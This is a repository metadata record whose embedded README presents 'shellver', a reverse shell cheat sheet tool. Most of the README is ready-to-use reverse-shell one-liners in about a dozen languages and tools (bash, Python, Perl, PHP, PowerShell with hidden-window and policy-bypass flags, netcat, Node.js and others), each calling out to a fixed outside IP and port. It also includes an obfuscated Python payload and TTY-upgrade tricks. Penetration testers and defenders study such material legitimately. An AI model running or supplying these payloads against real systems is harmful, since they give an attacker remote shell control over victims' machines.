{"id":15016461,"url":"https://github.com/0xr0/shellver","last_synced_at":"2025-04-09T19:32:23.299Z","repository":{"id":50653502,"uuid":"158273046","full_name":"0xR0/shellver","owner":"0xR0","description":"Reverse Shell Cheat Sheet TooL","archived":false,"fork":false,"pushed_at":"2020-05-09T18:06:55.000Z","size":1572,"stargazers_count":293,"open_issues_count":2,"forks_count":71,"subscribers_count":21,"default_branch":"master","last_synced_at":"2025-03-23T21:23:09.384Z","etag":null,"topics":["bash","exploit","java","linux","metasploit","netcat","perl","php","python","reverse","ruby","shell","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xR0.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-11-19T18:38:02.000Z","updated_at":"2025-02-24T20:59:15.000Z","dependencies_parsed_at":"2022-09-04T18:11:40.767Z","dependency_job_id":null,"html_url":"https://github.com/0xR0/shellver","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xR0%2Fshellver","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xR0%2Fshellver/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xR0%2Fshellver/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xR0%2Fshellver/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xR0","download_url":"https://codeload.github.com/0xR0/shellver/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248097959,"owners_count":21047344,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","exploit","java","linux","metasploit","netcat","perl","php","python","reverse","ruby","shell","windows"],"created_at":"2024-09-24T19:48:55.117Z","updated_at":"2025-04-09T19:32:23.256Z","avatar_url":"https://github.com/0xR0.png","language":"Python","readme":"\n                                                        .:: 0xR ::.\n                                            .:: Reverse Shell Cheat Sheet Tool ::.\n                                                 .:: cyber-warrior.org ::.\n \n\n#Install Note\n\nClone the repository:\n\n git clone https://github.com/0xR0/shellver.git\nThen go inside:\n\n cd shellver/\nThen install it:\n\n python setup.py -i\n \nFor reinstall\n\n python setup.py -r\n \nrun shellver -h or \"shellver msf {} shell {} spawn\".format (or)✔\n\n#Example\n\nshellver shell\n\n\u003cimg src=\"https://github.com/0xR0/shellver/blob/master/ss/py.png\" \u003e\n\n\nshellver msf\n\n\u003cimg src=\"https://github.com/0xR0/shellver/blob/master/ss/all.png\" \u003e\n\nFrom https://github.com/swisskyrepo\n# Reverse Shell Methods\n\n```\n╔Bash TCP═══════════════════════════════════════════\n║ bash -i \u003e\u0026 /dev/tcp/171.25.193.25/1234 0\u003e\u00261\t\t\t\t\t\t    \n║═══════════════════════════════════════════════════\n║ 0\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/171.25.193.25/1234; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196  \n╚═══════════════════════════════════════════════════\n\n\n╔Bash UDP═════════════╦═════════════════════════════\n║ Run Target Machine  ║ sh -i \u003e\u0026 /dev/udp/171.25.193.25/1234 0\u003e\u00261   \n╚═════════════════════╩═════════════════════════════\n\n\n╔PERL═══════════════════════════════════════════════\n║ perl -e 'use Socket;$i=\"171.25.193.25\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n \n╔═══════════════════════════════════════════════════\t\t\t\t\t\t\n║ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"171.25.193.25:1234\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);system$_ while\u003c\u003e;'\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t \n╔══════════════╦════════════════════════════════════\n║ Windows only ║ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"171.25.193.25:1234\");STDIN-\u003efdopen($c,r);$~-\u003efdopen($c,w);system$_ while\u003c\u003e;'\t\t\t\t\t\t\t\n  \n════════════════════════════════════════════════════\t\t\t\t\t\t\n\n\n╔PYTHON═════════════════════════════════════════════ \n║ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"171.25.193.25\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'    \n\n╔═══════════════════════════════════════════════════\t\t\t\t\t\t\n║ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"171.25.193.25\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n╔═══════════════════════════════════════════════════\n║ C:\\Python27\\python.exe -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('171.25.193.25', 1234)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) \u003e 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))\"\n     \n════════════════════════════════════════════════════\n\n\n╔PHP════════════════════════════════════════════════\n║ php -r '$sock=fsockopen(\"171.25.193.25\",1234);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\n╚═══════════════════════════════════════════════════\n\n\n╔RUBY═══════════════════════════════════════════════\n║ ruby -rsocket -e'f=TCPSocket.open(\"171.25.193.25\",1234).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\n                        \n╔═══════════════════════════════════════════════════\n║ ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"171.25.193.25\",\"1234\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n  \n╔══════════════╦════════════════════════════════════\n║ Windows only ║ ruby -rsocket -e 'c=TCPSocket.new(\"171.25.193.25\",\"1234\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n  \n════════════════════════════════════════════════════\n\n\n╔Netcat Traditional═════════════════════════════════\n║ nc -e /bin/sh 171.25.193.25 1234\n╚═══════════════════════════════════════════════════\n\n\n╔Netcat OpenBsd═════════════════════════════════════\n║ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 171.25.193.25 1234 \u003e/tmp/f\t\n╚═══════════════════════════════════════════════════\n\n\n╔NCAT═══════════════════════════════════════════════\n║ ncat 171.25.193.25 1234 -e /bin/bash\t\t   \n║═══════════════════════════════════════════════════\n║ ncat --udp 171.25.193.25 1234 -e /bin/bash  \n╚═══════════════════════════════════════════════════\n\n\n╔POWERSHELL═════════════════════════════════════════ \n║ powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"171.25.193.25\",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"\u003e \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()  \n\n╔═══════════════════════════════════════════════════\t\t\t\t\t\t\n║ powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('171.25.193.25',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '\u003e ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n════════════════════════════════════════════════════\n\n\n\n╔AWK════════════════════════════════════════════════ \n║ awk 'BEGIN {s = \"/inet/tcp/0/171.25.193.25/1234\"; while(42) { do{ printf \"shell\u003e\" |\u0026 s; s |\u0026 getline c; if(c){ while ((c |\u0026 getline) \u003e 0) print $0 |\u0026 s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n\n════════════════════════════════════════════════════\t\t\t\t\t\t\n\n\n╔JAWA═══════════════════════════════════════════════ \n║ r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/171.25.193.25/1234;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n\n════════════════════════════════════════════════════\t\t\t\t\t\t\n\n\n╔LUA══════════╦═════════════════════════════════════\n║ Linux only  ║ lua -e \"require('socket');require('os');t=socket.tcp();t:connect('171.25.193.25','1234');os.execute('/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263');\"\n\n════════════════════════════════════════════════════\n\n╔════════════════════╦══════════════════════════════\n║ Windows and Linux  ║ lua5.1 -e 'local host, port = \"171.25.193.25\", 1234 local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'\n\n════════════════════════════════════════════════════\n\n\n╔NODEJS═════════════════════════════════════════════ \n║(function(){\n    var net = require(\"net\"),\n        cp = require(\"child_process\"),\n        sh = cp.spawn(\"/bin/sh\", []);\n    var client = new net.Socket();\n    client.connect(1234, \"171.25.193.25\", function(){\n        client.pipe(sh.stdin);\n        sh.stdout.pipe(client);\n        sh.stderr.pipe(client);\n    });\n    return /a/; // Prevents the Node.js application form crashing\n})();\n\n╔═════╦═════════════════════════════════════════════\n║ OR  ║ require('child_process').exec('nc -e /bin/sh 171.25.193.25 1234')\n╚═════╩═════════════════════════════════════════════\n╔═════╦═════════════════════════════════════════════\n║ OR  ║ -var x = global.process.mainModule.require\n-x('child_process').exec('nc 171.25.193.25 1234 -e /bin/bash')\n\n════════════════════════════════════════════════════\n\n╔JAWA For GROOVY════════════════════════════════════ \n║ String host=\"171.25.193.25\";\nint port=1234;\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u003e0)so.write(pi.read());while(pe.available()\u003e0)so.write(pe.read());while(si.available()\u003e0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n\n════════════════════════════════════════════════════\n```\n# Spawn TTY\n\n```bash\n/bin/sh -i\n```\n\n(From an interpreter)\n\n```powershell\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\nperl -e 'exec \"/bin/sh\";'\nperl: exec \"/bin/sh\";\nruby: exec \"/bin/sh\"\nlua: os.execute('/bin/sh')\n```\n\nAccess shortcuts, su, nano and autocomplete in a partially tty shell\n/!\\ OhMyZSH might break this trick, a simple `sh` is recommended\n\n```powershell\n# in host\nctrl+z\nstty raw -echo\nfg\n\n# in reverse shell\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty rows \u003cnum\u003e columns \u003ccols\u003e\n```\n\n(From within vi)\n\n```bash\n:!bash\n:set shell=/bin/bash:shell\n```\n\n(From within nmap)\n\n```sh\n!sh\n```\n\n## Thanks to\n\n* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)\n* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)\n* [Spawning a TTY Shell](http://netsec.ws/?p=337)\n* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xr0%2Fshellver","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xr0%2Fshellver","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xr0%2Fshellver/lists"}